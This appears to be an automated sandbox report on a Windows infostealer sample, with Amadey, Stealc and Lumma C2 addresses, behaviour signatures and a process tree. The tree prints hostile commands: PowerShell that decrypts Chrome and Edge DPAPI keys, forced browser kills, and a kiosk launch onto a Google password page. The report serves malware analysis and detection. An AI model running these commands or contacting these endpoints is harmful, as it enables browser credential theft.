Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
19-11-2024 00:03
General
-
Target
file.exe
-
Size
1.8MB
-
MD5
542ee57c01af5be82d6f8ce3d1d9330f
-
SHA1
0219e3b1c42045f73a41e977b02625c528321826
-
SHA256
d1b6e19a825bdeeef8425c5ff8b5872744155213f66d251d20d0bb4f4cca57ce
-
SHA512
2b8c9d6b5f496c889bb517f556ca786b2c7325f2a669b2b59ace5fcf0e3cbdde38bbc223a92b7ca9af2388a43d97c392911e4a1d4d386f41295b19a935a29811
-
SSDEEP
49152:HtFr02btiDdtfmHnzQz6084x/zk+2liU0up:H3rvUfmHzQe0r2liRup
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://processhol.sbs/api
https://p10tgrace.sbs/api
https://peepburry828.sbs/api
https://3xp3cts1aim.sbs/api
https://p3ar11fter.sbs/api
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 9 IoCs
-
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Kills process with taskkill 5 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
-
Suspicious behavior: MapViewOfSection 44 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 31 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1007251001\Potwierdzenie.exe"C:\Users\Admin\AppData\Local\Temp\1007251001\Potwierdzenie.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1007251001\Potwierdzenie.exe"C:\Users\Admin\AppData\Local\Temp\1007251001\Potwierdzenie.exe" -c "C:\Users\Admin\AppData\Local\Temp\1007251001\Data\php-cli.ini" "C:\Users\Admin\AppData\Local\Temp\1007251001\Data\v3lib.php"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /s /c "wmic path win32_videocontroller get caption"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_videocontroller get caption6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /s /c "wmic os get Caption"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /s /c "wmic os get Version"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Version6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /s /c "powershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process; Add-Type -AssemblyName System.Security; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,102,177,26,43,73,185,195,101,239,243,122,245,189,107,81,67,109,36,10,245,44,7,143,160,99,50,199,20,232,248,239,112,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,81,53,127,36,12,255,68,164,74,21,40,19,231,93,77,7,67,211,67,189,8,25,249,240,180,190,135,68,159,235,108,231,48,0,0,0,110,12,170,120,60,160,102,44,248,179,89,135,191,252,92,211,41,133,68,81,119,82,12,222,65,14,237,166,37,195,106,134,14,140,4,194,106,12,97,164,25,42,143,201,126,254,170,111,64,0,0,0,0,143,165,211,0,232,0,127,166,172,145,237,17,3,253,181,202,253,158,162,85,109,8,12,163,172,115,228,110,209,42,1,142,44,117,188,9,160,177,187,41,146,67,152,183,219,241,243,246,109,118,178,216,53,81,14,251,202,53,212,44,16,33,178), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString""5⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process; Add-Type -AssemblyName System.Security; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,102,177,26,43,73,185,195,101,239,243,122,245,189,107,81,67,109,36,10,245,44,7,143,160,99,50,199,20,232,248,239,112,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,81,53,127,36,12,255,68,164,74,21,40,19,231,93,77,7,67,211,67,189,8,25,249,240,180,190,135,68,159,235,108,231,48,0,0,0,110,12,170,120,60,160,102,44,248,179,89,135,191,252,92,211,41,133,68,81,119,82,12,222,65,14,237,166,37,195,106,134,14,140,4,194,106,12,97,164,25,42,143,201,126,254,170,111,64,0,0,0,0,143,165,211,0,232,0,127,166,172,145,237,17,3,253,181,202,253,158,162,85,109,8,12,163,172,115,228,110,209,42,1,142,44,117,188,9,160,177,187,41,146,67,152,183,219,241,243,246,109,118,178,216,53,81,14,251,202,53,212,44,16,33,178), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /s /c "powershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process; Add-Type -AssemblyName System.Security; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,39,19,78,149,121,181,167,81,239,194,103,77,198,156,120,120,247,244,202,176,184,17,85,78,59,29,198,219,203,238,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,248,92,249,62,65,149,47,110,21,60,135,79,23,18,163,12,246,10,137,162,169,189,202,100,39,223,20,63,21,24,161,172,48,0,0,0,249,173,150,250,152,87,128,153,68,12,45,90,198,220,55,13,229,172,194,125,99,137,154,246,125,111,102,149,130,197,190,75,97,25,48,229,182,44,61,253,104,51,16,85,226,74,180,64,64,0,0,0,89,143,140,204,74,133,97,128,122,74,214,182,127,253,212,206,252,236,41,180,158,50,83,61,13,166,174,194,98,210,159,38,136,5,230,100,124,36,185,112,221,96,155,39,22,224,93,103,110,214,106,123,88,204,153,62,232,35,54,206,75,247,4,34), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString""5⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process; Add-Type -AssemblyName System.Security; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,39,19,78,149,121,181,167,81,239,194,103,77,198,156,120,120,247,244,202,176,184,17,85,78,59,29,198,219,203,238,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,248,92,249,62,65,149,47,110,21,60,135,79,23,18,163,12,246,10,137,162,169,189,202,100,39,223,20,63,21,24,161,172,48,0,0,0,249,173,150,250,152,87,128,153,68,12,45,90,198,220,55,13,229,172,194,125,99,137,154,246,125,111,102,149,130,197,190,75,97,25,48,229,182,44,61,253,104,51,16,85,226,74,180,64,64,0,0,0,89,143,140,204,74,133,97,128,122,74,214,182,127,253,212,206,252,236,41,180,158,50,83,61,13,166,174,194,98,210,159,38,136,5,230,100,124,36,185,112,221,96,155,39,22,224,93,103,110,214,106,123,88,204,153,62,232,35,54,206,75,247,4,34), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /s /c "tasklist"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1007274001\6e61fcda4b.exe"C:\Users\Admin\AppData\Local\Temp\1007274001\6e61fcda4b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1007275001\2583db2c2a.exe"C:\Users\Admin\AppData\Local\Temp\1007275001\2583db2c2a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1007276001\6cf4e7b748.exe"C:\Users\Admin\AppData\Local\Temp\1007276001\6cf4e7b748.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1908 -parentBuildID 20240401114208 -prefsHandle 1836 -prefMapHandle 1828 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66864c04-a198-480f-97a7-7c346890b53f} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" gpu6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2400 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2388 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22f3e004-8db4-4158-b1c2-84375d9fc33b} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" socket6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3284 -childID 1 -isForBrowser -prefsHandle 3276 -prefMapHandle 3020 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8941f8ce-3681-42b8-bd0b-901abfa0f855} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4000 -childID 2 -isForBrowser -prefsHandle 3944 -prefMapHandle 3016 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {676f1cb9-f167-42cf-aea8-6f591096543b} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4588 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4584 -prefMapHandle 4616 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5937692-5a09-4c3e-82e0-6850dddd0b4e} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" utility6⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5060 -childID 3 -isForBrowser -prefsHandle 5052 -prefMapHandle 5028 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d70d0f9-af70-416e-bf09-a5e6bcf013fd} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5364 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aacdf7ea-bc92-44ea-960f-25632ba10ab4} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5216 -childID 5 -isForBrowser -prefsHandle 5548 -prefMapHandle 5552 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1316 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b28c6c4-fb14-4dee-b74d-9d6ed4f211e3} 2996 "\\.\pipe\gecko-crash-server-pipe.2996" tab6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1007277001\f7e7d1a020.exe"C:\Users\Admin\AppData\Local\Temp\1007277001\f7e7d1a020.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
86B
MD56617faf8f3d5a4bab9ed7e6d6d81e9ac
SHA147c5d229c3d06a26d685b7c3357c9aa1951ed676
SHA2563d87146ba69810e07cad4bd64c1731d41a2359e5d97e47115ca467784fcfc7eb
SHA512452f926f36be843d2b76cdd7079b058986620419bb093b563ab17435b95b05d865b6903124723b2c9a60a04114ede43ca6deb2694ab7ccbce4bf831b590855fe
-
Filesize
301B
MD500841cf553a50add2939ba0c7cf1bbb0
SHA174f205e3f6deeae3027cd63a59f0368d44cec3d9
SHA2569aca7f58a7a7979ad7c18b0767e81bedc9000e96c52d061ed08e163265179304
SHA512e29499a063eef384c29494ba2db5c7e5e67f39be3b73f185b4d0e8ad6d9da66a1ec7b6e7452cff646ad72db22d773658865f1674b1b2f14762b7508351299149
-
Filesize
64B
MD5a026938c76154f4ae38f0b5300414799
SHA1ae81e56b6c6577b434dd0175ee27adef9a97fcab
SHA25624c195bc8a7d25a59f25029547ab7b94c1b9bea04297e7eee9142f8294e81ae9
SHA512a0099c8e4d6dd1c20949cedc518e20e3e27558d190ef0f242bbd4d942b8516e9a374ed5ca4f519cb0be9a9c7f7b5304f73b3f012aba2ec224655d32f3c9c708b
-
Filesize
66B
MD51acb50b14235a2e4857e50858bb68289
SHA14e5f96d5797a9b5b426c6ec951c10574b4ad2d56
SHA25617e4e85436c2528f73fec33bdfb0dab0b6477c2cfad8e1a0275c031decbc2412
SHA51226a276a92e5b3b929806ee80ce34248ca09986b9c8c4dc4e1929b47e6ac78d5e52b83fb4eca491b5c5df0538d1e4e70a46753e35b23221cbb38ae7e45df71f27
-
Filesize
2KB
MD5c28c81bbacddfff4c7e9956d21244344
SHA136a658df27ab275880925a48c4067ea053557776
SHA256654367144a505c9eafa601df19091c8e653ede8538ba435095a15c8ad3d06e0a
SHA51216954af3d9ab8414dbec5eda7383079c5fc1f2db5ee2b6ee7333532916a114c112e2780b574ddc5035d3eab238e31ba3a98d647e706b7e1c5ba5d0d2cd28e29b
-
Filesize
17KB
MD55316b0567eb6406eb7db36aa92b95b5e
SHA17fc2f5e5e2921ec64283209f19809f2b1a46968f
SHA2563f948ec927a08a1c41d0528f22d86432fd7fd891ef4eece2e54662a9213a3ea3
SHA5124852e5d1c75f86abe2abd0a2fb4a42f2ba161f7aceb2f2103a8de1151cb36d18a2494414c6708dec910c43fe3a9354aebb49ac3ff5043008da3d68446b2373ec
-
Filesize
27KB
MD5e4c2f59ab91c8c73af03148a6cc0e482
SHA1d6ed3727c9b59951c0a6a0e693b72fd62b9f51ab
SHA25654ae732f077e17c2a18dc37c84a3785229ebd82ac57208587735f8b392ad143b
SHA5124cc9f520cb6b00eda542b4af075680df997683e14b2c8657ad2e86040eb9e9ce7b357577ac34df2f9bda435ebf6b9efca614c69819f95404faa52c3588d8047a
-
Filesize
13KB
MD585f0e2b47b411b61223e4fe0e85e31d9
SHA1d743fac30bcca277a4bd89be4f650d71bd835aea
SHA2561d428622e3f16224c6b2f05025aa25d3220cc52f0a36e58d4c94d5063fd4bdd1
SHA512ea833780f26cad143ef6fff862b008ab33938d74c05620daad470c75029d792c110f704c9f9f8f91e524bf1275ba1f8bc7c7d989ef67ddcbaf8aff5a4968ae92
-
Filesize
35.9MB
MD5bb1c7286c327eafc7cf6a21492cdfa0f
SHA1953bbd989bddc742a0c3de4f4320d0b39e558aa5
SHA2568ac63cd639f78b172efc3c4cfecbe7dae3cd7f3dc245d31476187b0517c1babd
SHA512a4f0aeaf9327e63f00dc33ebf3fdd60d35c20ee5f3d3124fc994367ca25913784e1a9a063c7722ae38ef3c3b52c53c90d55da1dd9252c5da96a86c78fd97fcca
-
Filesize
1.8MB
MD54ef4e5ce9d34e265e89d281844d05cb6
SHA1897a84b329075f9acba25a93fcfa433c13406abb
SHA2567bdddb6905b7382116d2d5c06bddc1b7e1a40456e212177ba113efda62c5c831
SHA5128f0494107edcc88ae16440016b83320c559755655514347f6bec4aa2829c78eb7d0d4aedce054d1dbed5db5f28198675aa24c11f4c548eaabc85a3b9f69b44b5
-
Filesize
1.7MB
MD585de022b435230944001f8a62983e321
SHA1ee965e33549079d677a5a77e53f6e6809f614e57
SHA256d8a50d07f528de1a2888c9f0f713a1f61ebdda5e1a3747df5306f9a6b59feeb0
SHA5126b8f9ce5f820027439a89c3dcc53a53003416efa16339086e372f99ac1205c602692311abe1b10df4d5c1da29f5efb5298f714781d1ae573c0d3ef2e601b864b
-
Filesize
900KB
MD5016c4fb48ba8451e45562e05a9f972e5
SHA17b7638d6aeaea727d21e39597faa116569fc9d49
SHA256d794430a712471cbc5d708a75a1d4d531f179daae98661600d14932f8e238ef6
SHA512f2b62319b77e7ae73284deae1e73ef39d5cdb027163e071a7a651a545da9db0c70c25b6ceb2c3da31556d03f6350701f824aca481fabfdd903d0c617c7ffc45c
-
Filesize
2.7MB
MD5ce95ae34c1e8e0697b888a5357adf7fb
SHA1f20ac8415050a48a0ffe5607bdf854d532f39efd
SHA2564277dfe0ff849c665a40ce3890cf70ea4eccdde53d5cf2a7b69fdae66c988d37
SHA512f9ffd3865994d60b6a45194251bff7c8a4147adaa0fbe8e03028987f1c6a0c25435cf9a1a533ec546cdd00ecd24c20616c9b3808568e36caeae303be66d5c58a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD5542ee57c01af5be82d6f8ce3d1d9330f
SHA10219e3b1c42045f73a41e977b02625c528321826
SHA256d1b6e19a825bdeeef8425c5ff8b5872744155213f66d251d20d0bb4f4cca57ce
SHA5122b8c9d6b5f496c889bb517f556ca786b2c7325f2a669b2b59ace5fcf0e3cbdde38bbc223a92b7ca9af2388a43d97c392911e4a1d4d386f41295b19a935a29811
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
6KB
MD53b8f7d58afdbc5f7772045d7ee424277
SHA17e90a78a6acaf17258dfae959ba1ceef9c0f969c
SHA2568a6fe961aaf6c19148b4abfe038b1d6ce932c142f0cde74dd0f393615b1694ff
SHA5124519ff791aaadb89650e29cfdb44ae1e612dec779f6c8d38fad194a93c32f4fb37560507184c4254f4627f0c41b5a34164b439764197282c9087fc5ac31fb4fa
-
Filesize
8KB
MD57deb82ff4965a166507dd9352d8a3602
SHA1e43f905f3bb559497abf83fe82c5a9b28089a8bb
SHA25658251074624f2620e0d4b502bfb4eb294c22bc9958ed6d4c017fa74ee06ffaec
SHA512c68857a025d351bed27c0041ae1c5da82efaa970d29b0f6ac6e2ba0c701d2d2d495736a2a7b71f216ec6f333f7a2da58da428c4cb61a7b38a9e6ac9aa50a792e
-
Filesize
22KB
MD5d281eefdc390455c49e2dd681d8f4414
SHA104a14a7e6f9168e4980a5b28767744519eb9c2d3
SHA256375ab21a066bcb9521138635614a39a5d79482680826505d1ace4b41ee5c38fd
SHA512481daa8104253cd0aa901934e780fec5338506db577ceb9d9afe9356dc214dca8657ffcfd904db4721e5648d89e1d7eba591aefa996d8a3c2c5f3ebefbe91a12
-
Filesize
25KB
MD5fa0b2e78fc4d8e881235e09a94643518
SHA1a2cb446a90eefa0625c7b297dde09c79aca38b7e
